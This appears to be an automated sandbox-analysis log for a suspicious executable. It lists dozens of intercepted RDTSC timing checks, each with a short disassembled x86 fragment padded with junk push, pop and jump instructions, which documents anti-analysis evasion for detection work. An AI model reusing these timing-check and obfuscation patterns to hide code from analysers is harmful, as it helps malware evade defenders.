Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C1A5 second address: F9C1AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F9C1AB second address: F9C1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1531 second address: FA1557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F577C5415D8h 0x0000000b js 00007F577C5415C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA169D second address: FA16F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F577C53EFD1h 0x0000000a pushad 0x0000000b jmp 00007F577C53EFD8h 0x00000010 jnl 00007F577C53EFC6h 0x00000016 jmp 00007F577C53EFD4h 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007F577C53EFCEh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA16F8 second address: FA1710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C5415D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA188C second address: FA1895 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1895 second address: FA189D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F578CD second address: F578EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F577C53EFD3h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F578EE second address: F578FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F578FC second address: F57906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F577C53EFC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57906 second address: F5790A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5790A second address: F5795F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dx, 1D68h 0x0000000d mov ebx, dword ptr [ebp+12BBAA27h] 0x00000013 sub dword ptr [ebp+12BAA654h], esi 0x00000019 add eax, ebx 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F577C53EFC8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 jno 00007F577C53EFD2h 0x0000003b nop 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5795F second address: F57963 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57963 second address: F57971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F577C53EFCCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F57971 second address: F5797D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: F5797D second address: F579DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ecx, 68539FA7h 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007F577C53EFC8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c sub dword ptr [ebp+12A0264Bh], edi 0x00000032 mov dword ptr [ebp+12A033B2h], ebx 0x00000038 nop 0x00000039 jmp 00007F577C53EFCEh 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jnp 00007F577C53EFCCh 0x00000047 jno 00007F577C53EFC6h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1E61 second address: FA1E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F577C5415C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1E6D second address: FA1E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1E72 second address: FA1E86 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F577C5415CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA1FCD second address: FA1FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 je 00007F577C53EFCEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6B3F second address: FA6B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6CB3 second address: FA6CB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6CB8 second address: FA6CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6CBE second address: FA6CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6FC6 second address: FA6FCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA6FCF second address: FA6FE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F577C53EFCCh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA7101 second address: FA7109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA7109 second address: FA712D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F577C53EFCCh 0x0000000c jmp 00007F577C53EFD1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA712D second address: FA7187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D8h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop esi 0x0000000f jmp 00007F577C5415CBh 0x00000014 popad 0x00000015 push ebx 0x00000016 jmp 00007F577C5415D0h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F577C5415D9h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA675 second address: FAA692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F577C53EFCFh 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA692 second address: FAA6AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C5415D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA6AC second address: FAA6B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FA9F9A second address: FA9FBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F577C5415D7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA3B3 second address: FAA3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA3B9 second address: FAA3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F577C5415CDh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA3CB second address: FAA3E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA3E2 second address: FAA3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FAA3E6 second address: FAA3EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB0FD5 second address: FB1011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jp 00007F577C5415C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F577C5415D5h 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 js 00007F577C5415C8h 0x0000001a push eax 0x0000001b pop eax 0x0000001c jns 00007F577C5415D0h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1011 second address: FB102B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F577C53EFC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB102B second address: FB102F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB12AF second address: FB12B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB12B3 second address: FB12D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F577C5415C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F577C5415CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1557 second address: FB1581 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F577C53EFC6h 0x00000009 pop ecx 0x0000000a js 00007F577C53EFDAh 0x00000010 jmp 00007F577C53EFD2h 0x00000015 push eax 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1581 second address: FB159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F577C5415D2h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB159C second address: FB15A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1BC9 second address: FB1BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1BCE second address: FB1C27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F577C53EFCBh 0x00000008 jne 00007F577C53EFC6h 0x0000000e jmp 00007F577C53EFD2h 0x00000013 jmp 00007F577C53EFD9h 0x00000018 popad 0x00000019 jmp 00007F577C53EFD2h 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1C27 second address: FB1C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB1F42 second address: FB1F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB2212 second address: FB2229 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F577C5415CEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB2229 second address: FB2249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFCAh 0x00000009 popad 0x0000000a jmp 00007F577C53EFD1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB253D second address: FB2553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnl 00007F577C5415C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F577C5415C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB2AE5 second address: FB2AEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB5FF8 second address: FB600A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F577C5415CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB628B second address: FB629D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F577C53EFC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F577C53EFC6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB657C second address: FB6580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FB6580 second address: FB6584 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC206E second address: FC2072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC2237 second address: FC224F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F577C53EFC6h 0x00000009 jmp 00007F577C53EFCDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC224F second address: FC2282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F577C5415CEh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007F577C5415CFh 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F577C5415C6h 0x0000001b jno 00007F577C5415C6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC2547 second address: FC2550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC2677 second address: FC268A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jnp 00007F577C5415C6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC268A second address: FC268E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC27E4 second address: FC27EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC27EB second address: FC27F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC27F4 second address: FC27FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC3555 second address: FC3566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F577C53EFC6h 0x0000000a jns 00007F577C53EFC6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC3566 second address: FC356B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC3D00 second address: FC3D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F577C53EFCAh 0x00000009 popad 0x0000000a jo 00007F577C53EFEEh 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 jo 00007F577C53EFC6h 0x00000019 jmp 00007F577C53EFCEh 0x0000001e jno 00007F577C53EFC6h 0x00000024 popad 0x00000025 pushad 0x00000026 push edx 0x00000027 pop edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC1C00 second address: FC1C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FC889E second address: FC88B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCDh 0x00000007 pushad 0x00000008 jne 00007F577C53EFC6h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCF1FC second address: FCF208 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F577C5415C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCF208 second address: FCF214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F577C53EFC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCF214 second address: FCF218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCF218 second address: FCF238 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jo 00007F577C53EFC6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCF238 second address: FCF23C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCEC17 second address: FCEC30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCEC30 second address: FCEC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 pushad 0x00000007 jmp 00007F577C5415D0h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCEF21 second address: FCEF31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFCCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCEF31 second address: FCEF46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F577C5415CBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FCEF46 second address: FCEF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FDC6AA second address: FDC6B1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FDFFA6 second address: FDFFC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F577C53EFD9h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FDFFC5 second address: FDFFCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FDFFCA second address: FDFFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jne 00007F577C53EFC6h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\E6rBvcWFWu.exeRDTSC instruction interceptor: First address: FDFFDA second address: FE0004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F577C5415D1h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F577C5415CCh 0x00000017 rdtsc
